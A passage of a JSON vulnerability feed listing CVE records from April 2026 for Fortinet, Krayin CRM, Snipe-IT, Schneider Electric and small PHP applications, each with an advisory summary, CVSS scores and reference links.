an sql command ('sql injection') vulnerability in Fortinet FortiClientEMS 7.4.0 through 7.4.5, FortiClientEMS 7.2.0 through 7.2.12, FortiClientEMS 7.0 all versions may allow attacker to execute unauthorized code or commands via sending crafted requests","cvss":6.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.7,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://fortiguard.fortinet.com/psirt/FG-IR-26-102"],"published_time":"2026-04-14T16:16:45","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-39810","summary":"A use of hard-coded cryptographic key vulnerability in Fortinet FortiClientEMS 7.4.0 through 7.4.5 may allow attacker to information disclosure via decrypting database dump.","cvss":6.0,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.0,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://fortiguard.fortinet.com/psirt/FG-IR-26-107"],"published_time":"2026-04-14T16:16:45","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-39811","summary":"A integer overflow or wraparound vulnerability in Fortinet FortiWeb 8.0.0 through 8.0.3, FortiWeb 7.6.0 through 7.6.6, FortiWeb 7.4 all versions, FortiWeb 7.2 all versions, FortiWeb 7.0 all versions may allow attacker to denial of service via <insert attack vector here>","cvss":4.9,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":4.9,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://fortiguard.fortinet.com/psirt/FG-IR-26-108"],"published_time":"2026-04-14T16:16:45","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-39812","summary":"A improper neutralization of input during web page generation ('cross-site scripting') vulnerability in Fortinet FortiSandbox 5.0.0 through 5.0.5, FortiSandbox 4.4.0 through 4.4.8, FortiSandbox 4.2 all versions, FortiSandbox PaaS 5.0.0 through 5.0.5, FortiSandbox PaaS 4.4.0 through 4.4.8, FortiSandbox PaaS 4.2 all versions may allow attacker to execute unauthorized code or commands via <insert attack vector here>","cvss":4.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":4.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://fortiguard.fortinet.com/psirt/FG-IR-26-110"],"published_time":"2026-04-14T16:16:45","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-39813","summary":"A path traversal: '../filedir' vulnerability in Fortinet FortiSandbox 5.0.0 through 5.0.5, FortiSandbox 4.4.0 through 4.4.8 may allow attacker to escalation of privilege via <insert attack vector here>","cvss":9.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":9.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://fortiguard.fortinet.com/psirt/FG-IR-26-112"],"published_time":"2026-04-14T16:16:45","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-39814","summary":"A relative path traversal vulnerability in Fortinet FortiWeb 8.0.0 through 8.0.2, FortiWeb 7.6.0 through 7.6.6, FortiWeb 7.4.1 through 7.4.12, FortiWeb 7.2.7 through 7.2.12, FortiWeb 7.0.10 through 7.0.12 may allow attacker to execute unauthorized code or commands via <insert attack vector here>","cvss":6.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.7,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://fortiguard.fortinet.com/psirt/FG-IR-26-114"],"published_time":"2026-04-14T16:16:45","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-39808","summary":"A improper neutralization of special elements used in an os command ('os command injection') vulnerability in Fortinet FortiSandbox 4.4.0 through 4.4.8 may allow attacker to execute unauthorized code or commands via <insert attack vector here>","cvss":9.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":9.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://fortiguard.fortinet.com/psirt/FG-IR-26-100"],"published_time":"2026-04-14T16:16:44","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-38526","summary":"An authenticated arbitrary file upload vulnerability in the /admin/tinymce/upload endpoint of Webkul Krayin CRM v2.2.x allows attackers to execute arbitrary code via uploading a crafted PHP file.","cvss":9.9,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":9.9,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/TREXNEGRO/Security-Advisories/tree/main/CVE-2026-38526","https://github.com/krayin/laravel-crm","https://github.com/TREXNEGRO/Security-Advisories/blob/main/CVE-2026-38526/poc.md"],"published_time":"2026-04-14T16:16:43","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-38527","summary":"A Server-Side Request Forgery (SSRF) in the /settings/webhooks/create component of Webkul Krayin CRM v2.2.x allows attackers to scan internal resources via supplying a crafted POST request.","cvss":8.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.5,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/TREXNEGRO/Security-Advisories/tree/main/CVE-2026-38527","https://github.com/krayin/laravel-crm"],"published_time":"2026-04-14T16:16:43","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-38528","summary":"Krayin CRM v2.2.x was discovered to contain a SQL injection vulnerability via the rotten_lead parameter at /Lead/LeadDataGrid.php.","cvss":7.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.1,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/TREXNEGRO/Security-Advisories/tree/main/CVE-2026-38528","https://github.com/krayin/laravel-crm"],"published_time":"2026-04-14T16:16:43","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-38529","summary":"A Broken Object-Level Authorization (BOLA) in the /Settings/UserController.php endpoint of Webkul Krayin CRM v2.2.x allows authenticated attackers to arbitrarily reset user passwords and perform a full account takeover via supplying a crafted HTTP request.","cvss":8.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/TREXNEGRO/Security-Advisories/tree/main/CVE-2026-38529","https://github.com/krayin/laravel-crm"],"published_time":"2026-04-14T16:16:43","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-38530","summary":"A Broken Object-Level Authorization (BOLA) in the /Controllers/Lead/LeadController.php endpoint of Webkul Krayin CRM v2.2.x allows authenticated attackers to arbitrarily read, modify, and permanently delete any lead owned by other users via supplying a crafted GET request.","cvss":8.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.1,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/TREXNEGRO/Security-Advisories/tree/main/CVE-2026-38530","https://github.com/krayin/laravel-crm"],"published_time":"2026-04-14T16:16:43","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-38532","summary":"A Broken Object-Level Authorization (BOLA) in the /Contact/Persons/PersonController.php endpoint of Webkul Krayin CRM v2.2.x allows authenticated attackers to arbitrarily read, modify, and permanently delete any contact owned by other users via supplying a crafted GET request.","cvss":8.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.1,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/TREXNEGRO/Security-Advisories/tree/main/CVE-2026-38532","https://github.com/krayin/laravel-crm"],"published_time":"2026-04-14T16:16:43","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-38533","summary":"An improper authorization vulnerability in the /api/v1/users/{id} endpoint of Snipe-IT v8.4.0 allows authenticated attackers with the users.edit permission to modify sensitive authentication and account-state fields of other non-admin users via supplying a crafted PUT request.","cvss":null,"cvss_version":null,"cvss_v2":null,"cvss_v3":null,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/TREXNEGRO/Security-Advisories/tree/main/CVE-2026-38533","https://snipeitapp.com/"],"published_time":"2026-04-14T16:16:43","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-2404","summary":"CWE-116 Improper Encoding or Escaping of Output vulnerability exists that could cause log injection and forged log when an attacker alters the POST /j_security check request payload.","cvss":6.9,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":6.9,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2026-104-01&p_enDocType=Security+and+Safety+Notice&p_File_Name=SEVD-2026-104-01.pdf"],"published_time":"2026-04-14T16:16:39","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-2405","summary":"CWE-400 Uncontrolled Resource Consumption vulnerability exists that could cause excessive troubleshooting zip file creation and denial of service when a Web Admin user floods the system with POST /helpabout requests.","cvss":5.3,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":5.3,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2026-104-01&p_enDocType=Security+and+Safety+Notice&p_File_Name=SEVD-2026-104-01.pdf"],"published_time":"2026-04-14T16:16:39","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-2399","summary":"CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability exists that could cause critical files overwritten with text data when a Web Admin user alters the POST /REST/upssleep request payload.","cvss":6.9,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":6.9,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2026-104-01&p_enDocType=Security+and+Safety+Notice&p_File_Name=SEVD-2026-104-01.pdf"],"published_time":"2026-04-14T16:16:38","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-2400","summary":"CWE-93 Improper Neutralization of CRLF Sequences ('CRLF Injection') vulnerability exists that could cause application user credentials to reset  when  a Web Admin user alters the POST /setPCBEDesc request payload.","cvss":5.3,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":5.3,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2026-104-01&p_enDocType=Security+and+Safety+Notice&p_File_Name=SEVD-2026-104-01.pdf"],"published_time":"2026-04-14T16:16:38","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-2401","summary":"CWE-532 Insertion of Sensitive Information into Log File vulnerability exists that could cause  confidential information to be exposed when a Web Admin user executes a malicious file provided by an attacker.","cvss":2.4,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":2.4,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2026-104-01&p_enDocType=Security+and+Safety+Notice&p_File_Name=SEVD-2026-104-01.pdf"],"published_time":"2026-04-14T16:16:38","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-2402","summary":"CWE-307 Improper Restriction of Excessive Authentication Attempts vulnerability exists that would allow an attacker to gain access to the user account by performing an arbitrary number of authentication attempts with different credentials on a sequence of requests to multiple endpoints.","cvss":6.9,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":6.9,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2026-104-01&p_enDocType=Security+and+Safety+Notice&p_File_Name=SEVD-2026-104-01.pdf"],"published_time":"2026-04-14T16:16:38","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-2403","summary":"CWE-1284 Improper Validation of Specified Quantity in Input vulnerability exists that could cause Event and Data Log truncation impacting log integrity when a Web Admin user alters the POST /logsettings request payload.","cvss":5.3,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":5.3,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2026-104-01&p_enDocType=Security+and+Safety+Notice&p_File_Name=SEVD-2026-104-01.pdf"],"published_time":"2026-04-14T16:16:38","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-22828","summary":"A heap-based buffer overflow vulnerability in Fortinet FortiAnalyzer Cloud 7.6.2 through 7.6.4, FortiManager Cloud 7.6.2 through 7.6.4 may allow a remote unauthenticated attacker to execute arbitrary code or commands via specifically crafted requests. Successful exploitation would require a large amount of effort in preparation because of ASLR and network segmentation","cvss":8.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.1,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://fortiguard.fortinet.com/psirt/FG-IR-26-121"],"published_time":"2026-04-14T16:16:37","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-23708","summary":"A improper authentication vulnerability in Fortinet FortiSOAR PaaS 7.6.0 through 7.6.3, FortiSOAR PaaS 7.5.0 through 7.5.2, FortiSOAR on-premise 7.6.0 through 7.6.3, FortiSOAR on-premise 7.5.0 through 7.5.2 may allow an unauthenticated attacker to bypass authentication via replaying captured 2FA request. The attack requires being able to intercept and decrypt authentication traffic and precise timing to replay the request before token expiration, which raises the attack complexity.","cvss":7.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.5,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://fortiguard.fortinet.com/psirt/FG-IR-26-101"],"published_time":"2026-04-14T16:16:37","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-25691","summary":"A improper limitation of a pathname to a restricted directory ('path traversal') vulnerability in Fortinet FortiSandbox 5.0.0 through 5.0.5, FortiSandbox 4.4.0 through 4.4.8, FortiSandbox 4.2 all versions, FortiSandbox Cloud 5.0.4, FortiSandbox PaaS 5.0.4 may allow a privileged attacker with super-admin profile and CLI access to delete an arbitrary directory via HTTP crafted requests.","cvss":6.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.7,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://fortiguard.fortinet.com/psirt/FG-IR-26-115"],"published_time":"2026-04-14T16:16:37","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27316","summary":"A insufficiently protected credentials vulnerability in Fortinet FortiSandbox 5.0.0 through 5.0.5, FortiSandbox 4.4 all versions, FortiSandbox PaaS 5.0.1 through 5.0.5 may allow an authenticathed administrator to read LDAP server credentials via client-side inspection.","cvss":2.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":2.7,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://fortiguard.fortinet.com/psirt/FG-IR-26-113"],"published_time":"2026-04-14T16:16:37","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-22154","summary":"An improper neutralization of input during web page generation ('cross-site scripting') vulnerability in Fortinet FortiSOAR PaaS 7.6.0 through 7.6.3, FortiSOAR PaaS 7.5.0 through 7.5.2, FortiSOAR PaaS 7.4 all versions, FortiSOAR PaaS 7.3 all versions, FortiSOAR on-premise 7.6.0 through 7.6.3, FortiSOAR on-premise 7.5.0 through 7.5.2, FortiSOAR on-premise 7.4 all versions, FortiSOAR on-premise 7.3 all versions may allow an authenticated remote attacker to perform a stored cross site scripting (XSS) attack via crafted HTTP Requests.","cvss":4.6,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":4.6,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://fortiguard.fortinet.com/psirt/FG-IR-26-117"],"published_time":"2026-04-14T16:16:36","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-22155","summary":"A cleartext transmission of sensitive information vulnerability in Fortinet FortiSOAR PaaS 7.6.0 through 7.6.3, FortiSOAR PaaS 7.5.0 through 7.5.2, FortiSOAR PaaS 7.4 all versions, FortiSOAR PaaS 7.3 all versions, FortiSOAR on-premise 7.6.0 through 7.6.2, FortiSOAR on-premise 7.5.0 through 7.5.1, FortiSOAR on-premise 7.4 all versions, FortiSOAR on-premise 7.3 all versions may allow attacker to information disclosure via <insert attack vector here>","cvss":6.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.5,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://fortiguard.fortinet.com/psirt/FG-IR-26-106"],"published_time":"2026-04-14T16:16:36","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-22573","summary":"An improper limitation of a pathname to a restricted directory ('path traversal') vulnerability in Fortinet FortiSOAR PaaS 7.6.0 through 7.6.3, FortiSOAR PaaS 7.5 all versions, FortiSOAR PaaS 7.4 all versions, FortiSOAR PaaS 7.3 all versions, FortiSOAR on-premise 7.6.0 through 7.6.3, FortiSOAR on-premise 7.5 all versions, FortiSOAR on-premise 7.4 all versions, FortiSOAR on-premise 7.3 all versions may allow an authenticated remote attacker to perform path traversal attack via File Content Extraction actions.","cvss":6.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.5,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://fortiguard.fortinet.com/psirt/FG-IR-26-116"],"published_time":"2026-04-14T16:16:36","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-22574","summary":"A storing passwords in a recoverable format vulnerability in Fortinet FortiSOAR PaaS 7.6.0 through 7.6.4, FortiSOAR PaaS 7.5.0 through 7.5.2, FortiSOAR PaaS 7.4 all versions, FortiSOAR PaaS 7.3 all versions, FortiSOAR on-premise 7.6.0 through 7.6.4, FortiSOAR on-premise 7.5.0 through 7.5.2, FortiSOAR on-premise 7.4 all versions, FortiSOAR on-premise 7.3 all versions may allow an authenticated remote attacker to retrieve Service account password via server address modification in LDAP configuration.","cvss":4.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":4.1,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://fortiguard.fortinet.com/psirt/FG-IR-26-105"],"published_time":"2026-04-14T16:16:36","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-22576","summary":"A storing passwords in a recoverable format vulnerability in Fortinet FortiSOAR PaaS 7.6.0 through 7.6.4, FortiSOAR PaaS 7.5.0 through 7.5.2, FortiSOAR PaaS 7.4 all versions, FortiSOAR PaaS 7.3 all versions, FortiSOAR on-premise 7.6.0 through 7.6.4, FortiSOAR on-premise 7.5.0 through 7.5.2, FortiSOAR on-premise 7.4 all versions, FortiSOAR on-premise 7.3 all versions may allow an authenticated remote attacker to retrieve passwords for multiple installed connectors via server address modification in connector configuration.","cvss":4.3,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":4.3,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://fortiguard.fortinet.com/psirt/FG-IR-26-104"],"published_time":"2026-04-14T16:16:36","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-21741","summary":"An URL Redirection to Untrusted Site ('Open Redirect') vulnerability [CWE-601] vulnerability in Fortinet FortiNAC-F 7.6.0 through 7.6.5, FortiNAC-F 7.4 all versions, FortiNAC-F 7.2 all versions may allow a remote privileged attacker with system administrator role to redirect users to an arbitrary website via crafted CSV file.","cvss":2.4,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":2.4,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://fortiguard.fortinet.com/psirt/FG-IR-26-118"],"published_time":"2026-04-14T16:16:35","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-21742","summary":"A cleartext transmission of sensitive information vulnerability in Fortinet FortiSOAR PaaS 7.6.0 through 7.6.3, FortiSOAR PaaS 7.5.0 through 7.5.2, FortiSOAR PaaS 7.4 all versions, FortiSOAR PaaS 7.3 all versions, FortiSOAR on-premise 7.6.0 through 7.6.2, FortiSOAR on-premise 7.5.0 through 7.5.1, FortiSOAR on-premise 7.4 all versions, FortiSOAR on-premise 7.3 all versions may allow an authenticated attacker to view cleartext password in response for Secure Message Exchange and Radius queries, if configured","cvss":5.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.7,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://fortiguard.fortinet.com/psirt/FG-IR-26-106"],"published_time":"2026-04-14T16:16:35","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2025-65133","summary":"A SQL injection vulnerability exists in the School Management System (version 1.0) by manikandan580. An unauthenticated or authenticated remote attacker can supply a crafted HTTP request to the affected endpoint to manipulate SQL query logic and extract sensitive database information.","cvss":null,"cvss_version":null,"cvss_v2":null,"cvss_v3":null,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/TREXNEGRO/Security-Advisories/blob/main/CVE-2025-65133/README.md"],"published_time":"2026-04-14T16:16:34","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2025-65134","summary":"In manikandan580 School-management-system 1.0, a reflected cross-site scripting (XSS) vulnerability exists in /studentms/admin/contact-us.php via the email POST parameter.","cvss":null,"cvss_version":null,"cvss_v2":null,"cvss_v3":null,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/TREXNEGRO/Security-Advisories/blob/main/CVE-2025-65134/README.md"],"published_time":"2026-04-14T16:16:34","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2025-65135","summary":"In manikandan580 School-management-system 1.0, a time-based blind SQL injection vulnerability exists in /studentms/admin/between-date-reprtsdetails.php through the fromdate POST parameter.","cvss":9.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":9.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/TREXNEGRO/Security-Advisories/tree/main/CVE-2025-65135","https://github.com/TREXNEGRO/Security-Advisories/blob/main/CVE-2025-65135/poc.md"],"published_time":"2026-04-14T16:16:34","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2025-65136","summary":"In manikandan580 School-management-system 1.0, a reflected XSS vulnerability exists in /studentms/admin/contact-us.php via the pagedes POST parameter.","cvss":6.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.1,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/TREXNEGRO/Security-Advisories/blob/main/CVE-2025-65136/README.md"],"published_time":"2026-04-14T16:16:34","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2025-68649","summary":"An improper limitation of a pathname to a restricted directory ('path traversal') vulnerability in Fortinet FortiAnalyzer 7.6.0 through 7.6.4, FortiAnalyzer 7.4.0 through 7.4.7, FortiAnalyzer 7.2 all versions, FortiAnalyzer 7.0 all versions, FortiAnalyzer Cloud 7.6.0 through 7.6.4, FortiAnalyzer Cloud 7.4.0 through 7.4.7, FortiAnalyzer Cloud 7.2 all versions, FortiAnalyzer Cloud 7.0 all versions, FortiManager 7.6.0 through 7.6.4, FortiManager 7.4.0 through 7.4.7, FortiManager 7.2 all versions, FortiManager 7.0 all versions, FortiManager Cloud 7.6.0 through 7.6.4, FortiManager Cloud 7.4.0 through 7.4.7, FortiManager Cloud 7.2 all versions, FortiManager Cloud 7.0 all versions may allow a privileged attacker to delete files from the underlying filesystem via crafted CLI requests.","cvss":6.0,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.0,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://fortiguard.fortinet.com/psirt/FG-IR-26-120"],"published_time":"2026-04-14T16:16:34","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2025-63939","summary":"Improper input handling in /Grocery/search_products_itname.php, in anirudhkannan Grocery Store Management System 1.0, allows SQL injection via the sitem_name POST parameter.","cvss":9.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":9.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/TREXNEGRO/Security-Advisories/tree/main/CVE-2025-63939"],"published_time":"2026-04-14T16:16:33","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2025-65132","summary":"alandsilva26 hotel-management-php 1.0 is vulnerable to Cross Site Scripting (XSS) in /public/admin/edit_room.php which allows an attacker to inject and execute arbitrary JavaScript via the room_id GET parameter.","cvss":6.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.1,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/TREXNEGRO/Security-Advisories/blob/main/CVE-2025-65132/README.md"],"published_time":"2026-04-14T16:16:33","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2025-59809","summary":"A server-side request forgery (ssrf) vulnerability [CWE-918] vulnerability in Fortinet FortiSOAR PaaS 7.6.4, FortiSOAR PaaS 7.6.0 through 7.6.2, FortiSOAR PaaS 7.5.0 through 7.5.2, FortiSOAR PaaS 7.4 all versions, FortiSOAR PaaS 7.3 all versions, FortiSOAR on-premise 7.6.4, FortiSOAR on-premise 7.6.0 through 7.6.2, FortiSOAR on-premise 7.5.0 through 7.5.2, FortiSOAR on-premise 7.4 all versions, FortiSOAR on-premise 7.3 all versions may allow an authenticated attacker to discover services running on local ports via crafted requests.","cvss":4.3,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":4.3,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://fortiguard.fortinet.com/psirt/FG-IR-26-103"],"published_time":"2026-04-14T16:16:31","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2025-61624","summary":"An Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') [CWE-22] vulnerability in Fortinet FortiOS 7.6.0 through 7.6.4, FortiOS 7.4.0 through 7.4.9, FortiOS 7.2 all versions, FortiOS 7.0 all versions, FortiOS 6.4 all versions, FortiPAM 1.7.0, FortiPAM 1.6 all versions, FortiPAM 1.5 all versions, FortiPAM 1.4 all versions, FortiPAM 1.3 all versions, FortiPAM 1.2 all versions, FortiPAM 1.1 all versions, FortiPAM 1.0 all versions, FortiProxy 7.6.0 through 7.6.4, FortiProxy 7.4.0 through 7.4.11, FortiProxy 7.2 all versions, FortiProxy 7.0 all versions, FortiSwitchManager 7.2.0 through 7.2.7, FortiSwitchManager 7.0.0 through 7.0.6 may allow an authenticated attacker with admin profile and at least read-write permissions to write or delete arbitrary files via specific CLI commands.","cvss":6.0,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.0,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://fortiguard.fortinet.com/psirt/FG-IR-26-122"],"published_time":"2026-04-14T16:16:31","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2025-61848","summary":"An improper neutralization of special elements used in an sql command ('sql injection') vulnerability in Fortinet FortiAnalyzer 7.6.0 through 7.6.4, FortiAnalyzer 7.4.0 through 7.4.8, FortiAnalyzer 7.2 all versions, FortiAnalyzer 7.0 all versions, FortiAnalyzer Cloud 7.6.0 through 7.6.4, FortiAnalyzer Cloud 7.4.0 through 7.4.8, FortiAnalyzer Cloud 7.2 all versions, FortiAnalyzer Cloud 7.0 all versions, FortiManager 7.6.0 through 7.6.4, FortiManager 7.4.0 through 7.4.8, FortiManager 7.2 all versions, FortiManager 7.0 all versions, FortiManager Cloud 7.6.0 through 7.6.4, FortiManager Cloud 7.4.0 through 7.4.8, FortiManager Cloud 7.2 all versions, FortiManager Cloud 7.0 all versions may allow a privileged authenticated attacker to execute unauthorized code or commands via JSON RPC API","cvss":7.2,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.2,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://fortiguard.fortinet.com/psirt/FG-IR-26-111"],"published_time":"2026-04-14T16:16:31","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2025-61886","summary":"An Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability [CWE-79] vulnerability in Fortinet FortiSandbox 5.0.0 through 5.0.4, FortiSandbox PaaS 5.0.0 through 5.0.4 may allow an attacker to perform an XSS attack via crafted HTTP requests.","cvss":5.4,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.4,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://fortiguard.fortinet.com/psirt/FG-IR-26-109"],"published_time":"2026-04-14T16:16:31","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2025-53847","summary":"A missing authentication for critical function vulnerability in Fortinet FortiOS 7.6.0 through 7.6.3, FortiOS 7.4.0 through 7.4.8, FortiOS 7.2.0 through 7.2.11, 